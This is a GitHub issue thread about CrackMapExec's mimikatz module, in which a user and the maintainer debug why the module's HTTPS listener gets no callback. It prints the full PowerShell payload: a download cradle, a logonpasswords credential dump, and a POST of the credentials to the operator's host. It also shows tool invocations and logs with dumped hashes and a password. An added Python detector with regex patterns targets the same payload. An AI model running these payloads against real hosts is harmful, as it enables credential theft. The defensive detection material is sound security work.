byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License

mimikatz module http server issue #104

Closed ghost closed 8 years ago

ghost commented 8 years ago

The HTTP server started by the mimikatz module doesn't seem to be working properly. I never get a GET request from the victim host. And yes, there's a network connection between the hosts (L2), and no firewalls on. I can actually execute the powershell script successfully if I cd to data/PowerSploit/Exfiltration and do a "sudo python -m SimpleHTTPServer 80". Then on the client do a "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'" as in modules/credentials/mimikatz.py. However, I couldn't manage to dig up what's wrong with the crackmapexec server: it starts, the tcp handshake happens, but then it waits forever for a request that never happens.

Here's how I'm using the module: sudo python crackmapexec.py 192.168.88.151 -u john -p 'doe' -m modules/credentials/mimikatz.py --server-port 80

byt3bl33d3r commented 8 years ago

Can you please give me the full output of the command you used with the --verbose flag? Thanks!

ghost commented 8 years ago

Yes, here it is.

$ sudo python crackmapexec.py 192.168.88.151 -u john -p 'doe' -m modules/credentials/mimikatz.py --server-port 80 --verbose
04-23-2016 00:16:33 CME          192.168.88.151:445 WIN8            [*] Windows 6.3 Build 9600 (name:WIN8) (domain:HACME)
04-23-2016 00:16:33 CME          192.168.88.151:445 WIN8            [+] HACME\john:doe (Pwn3d!)
04-23-2016 00:16:33 DEBUG                                          Payload: 
        IEX (New-Object Net.WebClient).DownloadString('https://192.168.0.2:80/Invoke-Mimikatz.ps1');
        $creds = Invoke-VugNMrUfey -Command 'privilege::debug sekurlsa::logonpasswords exit';
        $request = [System.Net.WebRequest]::Create('https://192.168.0.2:80/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
        $request.ContentLength = $bytes.Length;
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
        $request.GetResponse();
04-23-2016 00:16:33 DEBUG                                          StringBinding: \\\\WIN8[\\PIPE\\atsvc]
04-23-2016 00:16:33 DEBUG                                          StringBinding: win8[49154]
04-23-2016 00:16:33 DEBUG                                          StringBinding: 192.168.88.151[49154]
04-23-2016 00:16:33 DEBUG                                          StringBinding chosen: ncacn_ip_tcp:192.168.88.151[49154]
04-23-2016 00:16:34 MIMIKATZ     192.168.88.151:445 WIN8            [+] Executed payload
04-23-2016 00:16:34 MIMIKATZ                                       [*] Waiting on 1 host(s)
04-23-2016 00:16:49 MIMIKATZ                                       [*] Waiting on 1 host(s)

I noticed that, even when specifying port 80, according to the debug it tries to go to https, though removing the option (which defaults to 443) didn't help either.
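
For defenders reading this thread: the debug output above prints the three-stage pattern the module's payload runs on the target (download cradle, credential dump through a randomly renamed Invoke- function, then an HTTP POST of the output back to the operator). The following is an added example, not CrackMapExec's own code, that flags that pattern in PowerShell script block log text. The sample entries, the hosts, the port and the random function name in them are constructed for the example.

```python
"""Flag the download-cradle / credential-dump / POST-exfil pattern from the issue's
debug payload in PowerShell script block text.  Added example, not CrackMapExec code."""
import re
from dataclasses import dataclass, field

# Constructed sample script block log entries (not real telemetry).  Entries 0 and 1
# follow the shape of the payload printed in the issue's debug output (addresses, port
# and the random function name are made up); entries 2 and 3 are benign.
SAMPLE_SCRIPT_BLOCKS = [
    """IEX (New-Object Net.WebClient).DownloadString('https://192.0.2.10:80/Invoke-Mimikatz.ps1');
$creds = Invoke-QwErTyUiOp -Command 'privilege::debug sekurlsa::logonpasswords exit';
$request = [System.Net.WebRequest]::Create('https://192.0.2.10:80/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();""",
    # same cradle, lower-cased and with no second stage: still worth a look
    """iex (new-object net.webclient).downloadstring('http://192.0.2.10/a.ps1')""",
    # benign administrative one-liner
    """Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer } | Select-Object Name""",
    # benign WebRequest: GET, not POST, and no cradle
    """$request = [System.Net.WebRequest]::Create('https://updates.example.internal/status');
$request.Method = 'GET';
$request.GetResponse();""",
]

# Stage 1: in-memory download cradle.  PowerShell is case-insensitive, so the regex is too.
DOWNLOAD_CRADLE = re.compile(
    r"\bIEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.\s*DownloadString\s*\(\s*'(?P<url>https?://[^']+)'",
    re.IGNORECASE,
)
# Stage 2: the function name is randomised (Invoke-VugNMrUfey in the issue), so key on the
# mimikatz command string that is passed to it, not on the name.
MIMIKATZ_COMMAND = re.compile(
    r"\bInvoke-\w+\s+-Command\s+'(?P<cmd>[^']*(?:sekurlsa::|privilege::debug|lsadump::)[^']*)'",
    re.IGNORECASE,
)
# Stage 3: a WebRequest to an explicit URL whose method is later set to POST.
POST_EXFIL = re.compile(
    r"\[System\.Net\.WebRequest\]::Create\s*\(\s*'(?P<url>https?://[^']+)'\s*\)[\s\S]*?\$\w+\.Method\s*=\s*'POST'",
    re.IGNORECASE,
)


@dataclass
class Finding:
    index: int
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)  # remote endpoints worth pivoting on

    @property
    def severity(self) -> str:
        if len(self.indicators) >= 2:
            return "high"
        if self.indicators:
            return "medium"
        return "none"


def analyse_script_block(index: int, text: str) -> Finding:
    """Run the three stage checks over one script block and collect what matched."""
    finding = Finding(index)
    m = DOWNLOAD_CRADLE.search(text)
    if m:
        finding.indicators.append("download_cradle")
        finding.urls.append(m.group("url"))
    if MIMIKATZ_COMMAND.search(text):
        finding.indicators.append("mimikatz_command")
    m = POST_EXFIL.search(text)
    if m:
        finding.indicators.append("http_post_exfil")
        finding.urls.append(m.group("url"))
    return finding


def scan(blocks) -> list:
    return [analyse_script_block(i, b) for i, b in enumerate(blocks)]


def flagged(blocks) -> list:
    return [f for f in scan(blocks) if f.severity != "none"]


if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.index}: severity={f.severity} indicators={f.indicators} urls={f.urls}")
```

The first sample scores "high" on all three stages with both endpoint URLs extracted, the lower-cased bare cradle scores "medium", and the two benign entries score nothing; the extracted URLs give the host and port the operator's listener was on, which is the pivot a responder wants from this telemetry.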

byt3bl33d3r commented 8 years ago

@fdiskyou just ran the same command and it works for me:

sudo python crackmapexec.py 192.168.0.12 -u Administrator -p 'P@ssw0rd'  -m modules/credentials/mimikatz.py --server-port 80 
04-22-2016 17:45:55 CME          192.168.0.12:445 WIN10BOX        [*] Windows 10.0 Build 10586 (name:WIN10BOX) (domain:LAB)
04-22-2016 17:45:56 CME          192.168.0.12:445 WIN10BOX        [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
04-22-2016 17:45:56 MIMIKATZ     192.168.0.12:445 WIN10BOX        [+] Executed payload
04-22-2016 17:45:56 MIMIKATZ                                       [*] Waiting on 1 host(s)
04-22-2016 17:45:57 MIMIKATZ     192.168.0.12                      [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
04-22-2016 17:45:57 MIMIKATZ     192.168.0.12                      [*] - - "POST / HTTP/1.1" 200 -
04-22-2016 17:45:57 MIMIKATZ     192.168.0.12                      [*] Saved Mimikatz's output to Mimikatz-192.168.0.12-2016-04-22_174557.log
04-22-2016 17:46:00 [*] KTHXBYE!

If you want to use a plain HTTP server you have to use the --server flag:

sudo python crackmapexec.py 192.168.0.12 -u Administrator -p 'P@ssw0rd'  -m modules/credentials/mimikatz.py --server http

byt3bl33d3r commented 8 years ago

Try using a different execution method (e.g. the --exec-method flag)

P.S. Ran the same command on an actual Windows 8 box and it works perfectly as well

sudo python crackmapexec.py 192.168.0.13 -u Administrator -p 'P@ssw0rd'  -m modules/credentials/mimikatz.py --server-port 80 
04-22-2016 17:50:39 CME          192.168.0.13:445 WIN8BOX         [*] Windows 6.3 Build 9600 (name:WIN8BOX) (domain:LAB)
04-22-2016 17:50:39 CME          192.168.0.13:445 WIN8BOX         [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
04-22-2016 17:50:40 MIMIKATZ     192.168.0.13:445 WIN8BOX         [+] Executed payload
04-22-2016 17:50:40 MIMIKATZ                                       [*] Waiting on 1 host(s)
04-22-2016 17:50:41 MIMIKATZ     192.168.0.13                      [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
04-22-2016 17:50:46 MIMIKATZ     192.168.0.13                      [*] - - "POST / HTTP/1.1" 200 -
04-22-2016 17:50:46 MIMIKATZ     192.168.0.13                      [+] Found credentials in Mimikatz output (domain\username:password)
04-22-2016 17:50:46 MIMIKATZ     192.168.0.13                      LAB\Administrator:e19ccf75ee54e06b06a5907af13cef42
04-22-2016 17:50:46 MIMIKATZ     192.168.0.13                      LAB\WIN8BOX$:b169b69ab87ce321d68aafd79cf93d56
04-22-2016 17:50:46 MIMIKATZ     192.168.0.13                      [*] Saved Mimikatz's output to Mimikatz-192.168.0.13-2016-04-22_175046.log

ghost commented 8 years ago

Ok, the --server http works. See below.

$ sudo python crackmapexec.py 192.168.88.151 -u john -p 'doe' -m modules/credentials/mimikatz.py --verbose --server http
04-23-2016 08:27:49 CME          192.168.88.151:445 WIN8            [*] Windows 6.3 Build 9600 (name:WIN8) (domain:HACME)
04-23-2016 08:27:49 CME          192.168.88.151:445 WIN8            [+] HACME\john:doe (Pwn3d!)
04-23-2016 08:27:49 DEBUG                                          Payload: 
        IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.2:80/Invoke-Mimikatz.ps1');
        $creds = Invoke-jxGRCyLUBf -Command 'privilege::debug sekurlsa::logonpasswords exit';
        $request = [System.Net.WebRequest]::Create('http://192.168.0.2:80/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
        $request.ContentLength = $bytes.Length;
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
        $request.GetResponse();
04-23-2016 08:27:50 DEBUG                                          StringBinding: \\\\WIN8[\\PIPE\\atsvc]
04-23-2016 08:27:50 DEBUG                                          StringBinding: win8[49154]
04-23-2016 08:27:50 DEBUG                                          StringBinding: 192.168.88.151[49154]
04-23-2016 08:27:50 DEBUG                                          StringBinding chosen: ncacn_ip_tcp:192.168.88.151[49154]
04-23-2016 08:27:50 MIMIKATZ     192.168.88.151:445 WIN8            [+] Executed payload
04-23-2016 08:27:50 MIMIKATZ                                       [*] Waiting on 1 host(s)
04-23-2016 08:27:51 MIMIKATZ     192.168.88.151                    [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
04-23-2016 08:27:58 MIMIKATZ     192.168.88.151                    [*] - - "POST / HTTP/1.1" 200 -
04-23-2016 08:27:58 MIMIKATZ     192.168.88.151                    [+] Found credentials in Mimikatz output (domain\username:password)
04-23-2016 08:27:58 MIMIKATZ     192.168.88.151                    HACME\Administrator:4f77309418a77ea1d42be5b4c4092546
04-23-2016 08:27:58 MIMIKATZ     192.168.88.151                    HACME\WIN8$:bbdf644b3e6aa65cbe307d1246d3e4ed
04-23-2016 08:27:58 MIMIKATZ     192.168.88.151                    HACME\Administrator:whatever
04-23-2016 08:27:58 MIMIKATZ     192.168.88.151                    [*] Saved Mimikatz's output to Mimikatz-192.168.88.151-2016-04-23_082758.log
04-23-2016 08:28:05 [*] KTHXBYE!

I'm wondering why the https didn't work though, my 443 was definitely your script and the communication was established. Anyway, thanks for your time. Cheers.

byt3bl33d3r commented 8 years ago

@fdiskyou probably something on your end. Closing since I can't reproduce this in any way.